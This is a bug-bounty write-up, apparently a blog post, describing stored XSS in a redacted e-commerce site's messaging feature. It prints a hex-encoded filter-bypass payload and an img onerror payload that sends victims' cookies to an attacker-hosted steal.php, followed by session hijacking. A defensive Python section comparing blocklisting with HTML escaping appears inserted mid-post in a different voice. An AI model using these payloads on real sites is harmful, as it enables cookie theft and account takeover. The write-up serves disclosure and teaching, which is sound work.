Hey everyone,

Today, I’m gonna share my story of an interesting XSS that I found on the same website, “redacted.com”. Since it was an e-commerce website, it had a feature where buyers and sellers could contact each other by sending messages. It seemed interesting to me and I decided to test it for XSS.

I made two accounts, one as a buyer and another as a seller. I started with sending “<>” to my seller’s account to see if these tags are being HTML encoded or not. To my surprise, the filter didn’t encode it. I decided to use the most powerful payload of all time,

<script>alert()</script>

As I typed the complete payload in the text box, an alert popped up. I was happy.

My Mind: Oh! That was a piece of cake.

My Fate:

As I clicked send, BOOM! I got an error. I was wondering why it happened. I thought it to be some client-side filter which was preventing the XSS payload from being sent. I tried to bypass the client-side filter using Burp Suite but hard luck! Then, I tried sending <script> and alert() separately to see what actually was being blocked by the filter. It didn’t allow me to send either. I tried using prompt() instead of alert() to bypass the filter but again, hard luck. I moved on to hex encode it and this time I got success. I escaped the filter using hex encoding. I made another payload, hoping for success this time.

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

YES! It escaped the filter! I quickly went to my seller’s account to see if I got an alert there.

Wait! What? No alert there. I checked the source and saw that the “onerror=[hex encoded payload]” part got truncated; only <img src=x> was left. I was like:

I tried all possible ways to trigger an alert but got no success at all. The filter was working way better than I expected. It was becoming really frustrating, since almost everything necessary to pop up an alert was being filtered. I really lost hope that I would get XSS there. The alert that popped up when I typed the payload in the text box was also of no use, since it was a Self Reflected XSS. I decided to take a break and go out for a walk.

My fate to my mind:

While walking, I was continuously thinking about it. It was time to think outside the box, since I had tried every possible way inside it. Suddenly, a thought came to my mind: what the hell was I going to do with an alert, since an alert is just a confirmation? I thought that instead of trying to trigger an alert, I should actually try to demonstrate the impact of it. At the same time, an alert triggered in my mind that <img src=x> got through when I tried to send the hex encoded payload. It got on my nerves.

I came back with rising hopes and tried sending <img src=x> to check if it was working or not. Yes, it was working. I quickly replaced x with a valid URL and saw that the image got rendered in the seller’s message box. At that moment, I was not interested in triggering an alert at all. I decided to demonstrate how an attacker could steal the cookies of sellers and other buyers using it. I went to my text editor, coded a few lines of PHP to steal cookies and uploaded it to a free web hosting service.

I made my final payload to request the PHP script that I had uploaded to the web hosting service so that I could steal the seller’s cookies.

<img src=x onerror="this.src='https://[your-webhosting]/steal.php?cookie='+document.cookie">

I quickly switched to my seller’s account and YES! The payload finally worked. I got the cookies! I tried to perform actions on behalf of the seller by replacing the cookies and WOAH! It worked.
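The two lessons a defender should take from the filter behaviour described above (the keyword blocklist that stopped <script> and alert() but let the <img ... onerror=...> message through) and from the cookie theft that followed: a blocklist of dangerous words is not a defence, contextual output encoding is, and a session cookie without HttpOnly is readable from any injected handler. The Python below is an added example, not code from the post or from the site; the blocklist is my reconstruction of what the write-up observed, the sample messages are constructed, and the Set-Cookie strings are made up.

```python
import html
import re

# Constructed reconstruction of the behaviour the write-up observed: the site's
# filter rejected messages containing "<script" or "alert(" / "prompt(" but let
# "<img src=x onerror=...>" through. This is an assumption, not the site's code.
BLOCKED_TOKENS = ("<script", "alert(", "prompt(")

# A tag start that a browser would parse as markup: "<" followed by a letter.
TAG_START = re.compile(r"<\s*[A-Za-z]")


def naive_blocklist_filter(message: str):
    """Blocklist approach: return the message untouched unless a banned token
    appears, in which case return None (the 'error' the author saw on send)."""
    lowered = message.lower()
    if any(token in lowered for token in BLOCKED_TOKENS):
        return None
    return message


def escape_for_html(message: str) -> str:
    """Output-encoding approach: render every message as text in an HTML body
    context. '<', '>', '&' and both quote characters become entities, so no
    user-supplied tag or attribute is ever interpreted by the browser."""
    return html.escape(message, quote=True)


def is_live_markup(rendered: str) -> bool:
    """True when the fragment still contains something the HTML parser would
    treat as a tag (used here only to compare the two strategies)."""
    return TAG_START.search(rendered) is not None


def compare_strategies(message: str) -> dict:
    """Run one message through both strategies and report what survives."""
    filtered = naive_blocklist_filter(message)
    return {
        "blocklist_accepts": filtered is not None,
        "blocklist_leaves_live_markup": filtered is not None and is_live_markup(filtered),
        "escaped_leaves_live_markup": is_live_markup(escape_for_html(message)),
    }


def cookie_readable_by_script(set_cookie_header: str) -> bool:
    """True when a Set-Cookie header lacks the HttpOnly attribute, i.e. the
    cookie is exposed to document.cookie and therefore to an injected handler."""
    attributes = [part.strip().lower() for part in set_cookie_header.split(";")[1:]]
    return "httponly" not in attributes


# Constructed sample messages: the two payloads from the write-up plus a benign
# message that legitimately contains a "<" character.
SAMPLE_MESSAGES = [
    "<script>alert()</script>",
    "<img src=x onerror=\"this.src='https://[your-webhosting]/steal.php?cookie='+document.cookie\">",
    "Is this still available? I can pay < 50 for it.",
]

if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print(repr(msg))
        print("  ", compare_strategies(msg))
        print("   escaped:", escape_for_html(msg))
    # Constructed headers: the first cookie is readable by script, the second is not.
    print(cookie_readable_by_script("session=abc123; Path=/; Secure"))
    print(cookie_readable_by_script("session=abc123; Path=/; Secure; HttpOnly"))
```

Running it shows the blocklist rejecting the <script> message but passing the onerror message intact, while escaping neutralises all three without breaking the benign message that contains a "<". Escaping is the right fix for text rendered into an HTML body; an attribute or URL context needs its own encoder, and an HttpOnly session cookie limits the damage if an encoding is ever missed.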

I was like:

You can connect via:

HAPPY HACKING!

Info-Sec Lover ❣️❣️
